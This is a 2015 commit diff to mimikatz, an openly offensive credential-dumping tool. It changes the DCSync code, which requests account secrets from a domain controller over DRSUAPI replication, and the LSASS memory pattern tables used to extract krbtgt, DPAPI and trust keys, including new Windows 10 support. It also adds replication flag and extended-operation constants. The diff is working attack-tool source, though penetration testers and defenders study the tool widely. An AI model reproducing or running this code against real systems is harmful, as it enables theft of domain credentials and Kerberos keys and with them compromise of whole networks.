DRSR fixes

diggold · Aug 23, 2015 · bdab94d · bdab94d
1 parent a3c105a
commit bdab94d
Show file tree

Hide file tree

Showing 7 changed files with 106 additions and 16 deletions.
diff --git a/mimidrv/mimidrv.rc b/mimidrv/mimidrv.rc
diff --git a/mimikatz/mimikatz.rc b/mimikatz/mimikatz.rc
@@ -21,7 +21,7 @@ BLOCK "StringFileInfo"
 			VALUE "FileDescription", "mimikatz for Windows"
 			VALUE "FileVersion", "2.0.0.0"
 			VALUE "InternalName", "mimikatz"
-			VALUE "LegalCopyright", "Copyright (c) 2007 - 2014 gentilkiwi (Benjamin DELPY)"
+			VALUE "LegalCopyright", "Copyright (c) 2007 - 2015 gentilkiwi (Benjamin DELPY)"
 			VALUE "OriginalFilename", "mimikatz.exe"
 			VALUE "PrivateBuild", "Build with love for POC only"
 			VALUE "SpecialBuild", "kiwi flavor !"

diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c
@@ -1527,10 +1527,10 @@ NTSTATUS kuhl_m_lsadump_hash(int argc, wchar_t * argv[])
 			if(NT_SUCCESS(kuhl_m_lsadump_get_dcc(dcc, hash, &uUsername, 0)))
 			{
 				kprintf(L"DCC1: "); kull_m_string_wprintf_hex(dcc, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
-					if(NT_SUCCESS(kuhl_m_lsadump_get_dcc(dcc, hash, &uUsername, count)))
-					{
-						kprintf(L"DCC2: "); kull_m_string_wprintf_hex(dcc, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
-					}
+				if(NT_SUCCESS(kuhl_m_lsadump_get_dcc(dcc, hash, &uUsername, count)))
+				{
+					kprintf(L"DCC2: "); kull_m_string_wprintf_hex(dcc, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
+				}
 			}
 		}
 	}
@@ -1841,10 +1841,10 @@ NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[])
 						if(kull_m_rpc_drsr_getDCBind(&hBinding, &getChReq.V8.uuidDsaObjDest, &hDrs))
 						{
 							getChReq.V8.pNC = &dsName;
-							getChReq.V8.ulFlags = 0x00088030; // urgent, now!, 0x10 | 0x20 is cool too
+							getChReq.V8.ulFlags = DRS_INIT_SYNC | DRS_WRIT_REP | DRS_NEVER_SYNCED | DRS_FULL_SYNC_NOW | DRS_SYNC_URGENT;
 							getChReq.V8.cMaxObjects = 1;
 							getChReq.V8.cMaxBytes = 0x00a00000; // 10M
-							getChReq.V8.ulExtendedOp = 6;
+							getChReq.V8.ulExtendedOp = EXOP_REPL_OBJ;
 
 							RpcTryExcept
 							{
@@ -2022,7 +2022,7 @@ void kuhl_m_lsadump_dcsync_descrUser(ATTRBLOCK *attributes)
 	if(kuhl_m_lsadump_dcsync_findMonoAttr(attributes, ATT_USER_ACCOUNT_CONTROL, &data, NULL))
 	{
 		kprintf(L"User Account Control : %08x ( ", *(PDWORD) data);
-		for(i = 0; i < sizeof(DWORD) * 8; i++)
+		for(i = 0; i < KIWI_MINIMUM(ARRAYSIZE(KUHL_M_LSADUMP_UF_FLAG), sizeof(DWORD) * 8); i++)
 			if((1 << i) & *(PDWORD) data)
 				kprintf(L"%s ", KUHL_M_LSADUMP_UF_FLAG[i]);
 		kprintf(L")\n");
@@ -2111,10 +2111,10 @@ void kuhl_m_lsadump_dcsync_descrUserProperties(PUSER_PROPERTIES properties)
 			else if(RtlEqualUnicodeString(&PrimaryWDigest, &Name, TRUE))
 			{
 				pWDigest = (PWDIGEST_CREDENTIALS) data;
-				for(i = 0; i < pWDigest->NumberOfHashes; i++)
+				for(j = 0; j < pWDigest->NumberOfHashes; j++)
 				{
-					kprintf(L"    %02u  ", i + 1);
-					kull_m_string_wprintf_hex(pWDigest->Hash[i], MD5_DIGEST_LENGTH, 0);
+					kprintf(L"    %02u  ", j + 1);
+					kull_m_string_wprintf_hex(pWDigest->Hash[j], MD5_DIGEST_LENGTH, 0);
 					kprintf(L"\n");
 				}
 			}

diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c
@@ -416,6 +416,7 @@ KULL_M_PATCH_GENERIC SecDataReferences[] = {
 	{KULL_M_WIN_BUILD_VISTA,	{sizeof(PTRN_W2K8_SecData),		PTRN_W2K8_SecData},		{0, NULL}, { 11, 39}},
 	{KULL_M_WIN_BUILD_8,		{sizeof(PTRN_W2K12_SecData),	PTRN_W2K12_SecData},	{0, NULL}, { 10, 39}},
 	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_W2K12R2_SecData),	PTRN_W2K12R2_SecData},	{0, NULL}, {-12, 39}},
+	{KULL_M_WIN_BUILD_10,		{sizeof(PTRN_W2K12R2_SecData),	PTRN_W2K12R2_SecData},	{0, NULL}, { -9, 39}},
 };
 #elif defined _M_IX86
 BYTE PTRN_W2K3_SecData[]	= {0x53, 0x56, 0x8d, 0x45, 0x98, 0x50, 0xb9};
@@ -446,6 +447,7 @@ NTSTATUS kuhl_m_sekurlsa_krbtgt(int argc, wchar_t * argv[])
 					kuhl_m_sekurlsa_krbtgt_keys(dualKrbtgt.krbtgt_previous, L"Previous");
 				}
 			}
+			else PRINT_ERROR(L"Unable to find KDC pattern in LSASS memory\n");
 		}
 		else PRINT_ERROR(L"KDC service not in LSASS memory\n");
 	}
@@ -596,6 +598,7 @@ NTSTATUS kuhl_m_sekurlsa_dpapi_system(int argc, wchar_t * argv[])
 					else PRINT_ERROR(L"Not initialized!\n");
 				}
 			}
+			else PRINT_ERROR(L"Pattern not found in DPAPI service\n");
 		}
 		else PRINT_ERROR(L"DPAPI service not in LSASS memory\n");
 	}
@@ -607,7 +610,7 @@ BYTE PTRN_W2K8R2_DomainList[]	= {0xf3, 0x0f, 0x6f, 0x6c, 0x24, 0x30, 0xf3, 0x0f,
 BYTE PTRN_W2K12R2_DomainList[]	= {0x0f, 0x10, 0x45, 0xf0, 0x66, 0x48, 0x0f, 0x7e, 0xc0, 0x0f, 0x11, 0x05};
 KULL_M_PATCH_GENERIC DomainListReferences[] = {
 	{KULL_M_WIN_BUILD_7,	{sizeof(PTRN_W2K8R2_DomainList),		PTRN_W2K8R2_DomainList},	{0, NULL}, {10}},
-	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_W2K12R2_DomainList),	PTRN_W2K12R2_DomainList},	{0, NULL}, {12}},
+	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_W2K12R2_DomainList),	PTRN_W2K12R2_DomainList},	{0, NULL}, {8}},
 };
 NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
 {
@@ -640,6 +643,7 @@ NTSTATUS kuhl_m_sekurlsa_trust(int argc, wchar_t * argv[])
 						}
 					}
 				}
+				else PRINT_ERROR(L"Pattern not found in KDC service\n");
 			}
 			else PRINT_ERROR(L"KDC service not in LSASS memory\n");
 		}
@@ -753,6 +757,7 @@ void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB
 			}
 		}
 	}
+	else PRINT_ERROR(L"Pattern not found in DPAPI service\n");
 }
 
 BYTE PTRN_WALL_BackupKey[]			= {0xb9, 0x02, 0x00, 0x00, 0x00, 0x89, 0x05};

diff --git a/mimilib/mimilib.rc b/mimilib/mimilib.rc
diff --git a/modules/kull_m_rpc_drsr.c b/modules/kull_m_rpc_drsr.c
@@ -94,7 +94,7 @@ BOOL kull_m_rpc_drsr_deleteBinding(RPC_BINDING_HANDLE *hBinding)
 	return status;
 }
 
-UUID DRSUAPI_DS_BIND_UUID_Standard = {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
+GUID DRSUAPI_DS_BIND_GUID_Standard	= {0xe24d201a, 0x4fd6, 0x11d1, {0xa3, 0xda, 0x00, 0x00, 0xf8, 0x75, 0xae, 0x0d}};
 BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid)
 {
 	BOOL DomainGUIDfound = FALSE, ObjectGUIDfound = FALSE;
@@ -112,7 +112,7 @@ BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR
 	RpcTryExcept
 	{
 		DrsExtensionsInt.cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
-		drsStatus = IDL_DRSBind(*hBinding, &DRSUAPI_DS_BIND_UUID_Standard, (DRS_EXTENSIONS *) &DrsExtensionsInt, &pDrsExtensionsOutput, &hDrs);
+		drsStatus = IDL_DRSBind(*hBinding, &DRSUAPI_DS_BIND_GUID_Standard, (DRS_EXTENSIONS *) &DrsExtensionsInt, &pDrsExtensionsOutput, &hDrs);
 		if(drsStatus == 0)
 		{
 			dcInfoReq.V1.InfoLevel = 2;
@@ -169,7 +169,7 @@ BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObject
 	DRS_EXTENSIONS *pDrsExtensionsOutput = NULL;
 
 	DrsExtensionsInt.cb = sizeof(DRS_EXTENSIONS_INT) - sizeof(DWORD);
-	DrsExtensionsInt.dwFlags = 0x04408000; // DRS_EXT_GETCHGREQ_V6 | DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION
+	DrsExtensionsInt.dwFlags = DRS_EXT_GETCHGREPLY_V6 | DRS_EXT_STRONG_ENCRYPTION;
 
 	RpcTryExcept
 	{
@@ -183,6 +183,7 @@ BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObject
 		return status;
 }
 
+const wchar_t * KULL_M_RPC_DRSR_CrackNames_Error[] = {L"NO_ERROR", L"ERROR_RESOLVING", L"ERROR_NOT_FOUND", L"ERROR_NOT_UNIQUE", L"ERROR_NO_MAPPING", L"ERROR_DOMAIN_ONLY", L"ERROR_NO_SYNTACTICAL_MAPPING", L"ERROR_TRUST_REFERRAL"};
 BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain)
 {
 	BOOL status = FALSE;
@@ -210,7 +211,7 @@ BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWS
 						kull_m_string_copy(CrackedName, nameCrackRep.V1.pResult->rItems[0].pName);
 						kull_m_string_copy(CrackedDomain, nameCrackRep.V1.pResult->rItems[0].pDomain);
 					}
-					else PRINT_ERROR(L"CrackNames (name status): 0x%08x (%u)\n", drsStatus, drsStatus);
+					else PRINT_ERROR(L"CrackNames (name status): 0x%08x (%u) - %s\n", drsStatus, drsStatus, (drsStatus < ARRAYSIZE(KULL_M_RPC_DRSR_CrackNames_Error)) ? KULL_M_RPC_DRSR_CrackNames_Error[drsStatus] : L"?");
 				}
 				else PRINT_ERROR(L"CrackNames: no item!\n");
 			}

diff --git a/modules/kull_m_rpc_drsr.h b/modules/kull_m_rpc_drsr.h
@@ -18,6 +18,7 @@ typedef struct _DRS_EXTENSIONS_INT {
 	DWORD dwReplEpoch;
 	DWORD dwFlagsExt;
 	GUID ConfigObjGUID;
+	DWORD dwExtCaps;
 } DRS_EXTENSIONS_INT, *PDRS_EXTENSIONS_INT;
 
 typedef struct _ENCRYPTED_PAYLOAD {
@@ -29,6 +30,79 @@ typedef struct _ENCRYPTED_PAYLOAD {
 void __RPC_FAR * __RPC_USER midl_user_allocate(size_t cBytes);
 void __RPC_USER midl_user_free(void __RPC_FAR * p);
 
+#define DRS_EXT_BASE								0x00000001
+#define DRS_EXT_ASYNCREPL							0x00000002
+#define DRS_EXT_REMOVEAPI							0x00000004
+#define DRS_EXT_MOVEREQ_V2							0x00000008
+#define DRS_EXT_GETCHG_DEFLATE						0x00000010
+#define DRS_EXT_DCINFO_V1							0x00000020
+#define DRS_EXT_RESTORE_USN_OPTIMIZATION			0x00000040
+#define DRS_EXT_ADDENTRY							0x00000080
+#define DRS_EXT_KCC_EXECUTE							0x00000100
+#define DRS_EXT_ADDENTRY_V2							0x00000200
+#define DRS_EXT_LINKED_VALUE_REPLICATION			0x00000400
+#define DRS_EXT_DCINFO_V2							0x00000800
+#define DRS_EXT_INSTANCE_TYPE_NOT_REQ_ON_MOD		0x00001000
+#define DRS_EXT_CRYPTO_BIND							0x00002000
+#define DRS_EXT_GET_REPL_INFO						0x00004000
+#define DRS_EXT_STRONG_ENCRYPTION					0x00008000
+#define DRS_EXT_DCINFO_VFFFFFFFF					0x00010000
+#define DRS_EXT_TRANSITIVE_MEMBERSHIP				0x00020000
+#define DRS_EXT_ADD_SID_HISTORY						0x00040000
+#define DRS_EXT_POST_BETA3							0x00080000
+#define DRS_EXT_GETCHGREQ_V5						0x00100000
+#define DRS_EXT_GETMEMBERSHIPS2						0x00200000
+#define DRS_EXT_GETCHGREQ_V6						0x00400000
+#define DRS_EXT_NONDOMAIN_NCS						0x00800000
+#define DRS_EXT_GETCHGREQ_V8						0x01000000
+#define DRS_EXT_GETCHGREPLY_V5						0x02000000
+#define DRS_EXT_GETCHGREPLY_V6						0x04000000
+#define DRS_EXT_WHISTLER_BETA3						0x08000000
+#define DRS_EXT_W2K3_DEFLATE						0x10000000
+#define DRS_EXT_GETCHGREQ_V10						0x20000000
+#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART2	0x40000000
+#define DRS_EXT_RESERVED_FOR_WIN2K_OR_DOTNET_PART3	0x80000000
+
+#define DRS_ASYNC_OP								0x00000001
+#define DRS_GETCHG_CHECK							0x00000002
+#define DRS_UPDATE_NOTIFICATION						0x00000002
+#define DRS_ADD_REF									0x00000004
+#define DRS_SYNC_ALL								0x00000008
+#define DRS_DEL_REF									0x00000008
+#define DRS_WRIT_REP								0x00000010
+#define DRS_INIT_SYNC								0x00000020
+#define DRS_PER_SYNC								0x00000040
+#define DRS_MAIL_REP								0x00000080
+#define DRS_ASYNC_REP								0x00000100
+#define DRS_IGNORE_ERROR							0x00000100
+#define DRS_TWOWAY_SYNC								0x00000200
+#define DRS_CRITICAL_ONLY							0x00000400
+#define DRS_GET_ANC									0x00000800
+#define DRS_GET_NC_SIZE								0x00001000
+#define DRS_LOCAL_ONLY								0x00001000
+#define DRS_NONGC_RO_REP							0x00002000
+#define DRS_SYNC_BYNAME								0x00004000
+#define DRS_REF_OK									0x00004000
+#define DRS_FULL_SYNC_NOW							0x00008000
+#define DRS_NO_SOURCE								0x00008000
+#define DRS_FULL_SYNC_IN_PROGRESS					0x00010000
+#define DRS_FULL_SYNC_PACKET						0x00020000
+#define DRS_SYNC_REQUEUE							0x00040000
+#define DRS_SYNC_URGENT								0x00080000
+#define DRS_REF_GCSPN								0x00100000
+#define DRS_NO_DISCARD								0x00100000
+#define DRS_NEVER_SYNCED							0x00200000
+#define DRS_SPECIAL_SECRET_PROCESSING				0x00400000
+#define DRS_INIT_SYNC_NOW							0x00800000
+#define DRS_PREEMPTED								0x01000000
+#define DRS_SYNC_FORCED								0x02000000
+#define DRS_DISABLE_AUTO_SYNC						0x04000000
+#define DRS_DISABLE_PERIODIC_SYNC					0x08000000
+#define DRS_USE_COMPRESSION							0x10000000
+#define DRS_NEVER_NOTIFY							0x20000000
+#define DRS_SYNC_PAS								0x40000000
+#define DRS_GET_ALL_GROUP_MEMBERSHIP				0x80000000
+
 typedef enum {
 	DS_UNKNOWN_NAME = 0,
 	DS_FQDN_1779_NAME = 1,
@@ -72,6 +146,16 @@ typedef enum  {
 	DS_NAME_ERROR_TRUST_REFERRAL = 7
 } DS_NAME_ERROR;
 
+typedef enum {
+	EXOP_FSMO_REQ_ROLE = 1,
+	EXOP_FSMO_REQ_RID_ALLOC = 2,
+	EXOP_FSMO_RID_REQ_ROLE = 3,
+	EXOP_FSMO_REQ_PDC = 4,
+	EXOP_FSMO_ABANDON_ROLE = 5,
+	EXOP_REPL_OBJ = 6,
+	EXOP_REPL_SECRETS = 7
+} EXOP_REQ;
+
 #define ATT_RDN							589825
 #define ATT_OBJECT_SID					589970
 #define ATT_WHEN_CREATED				131074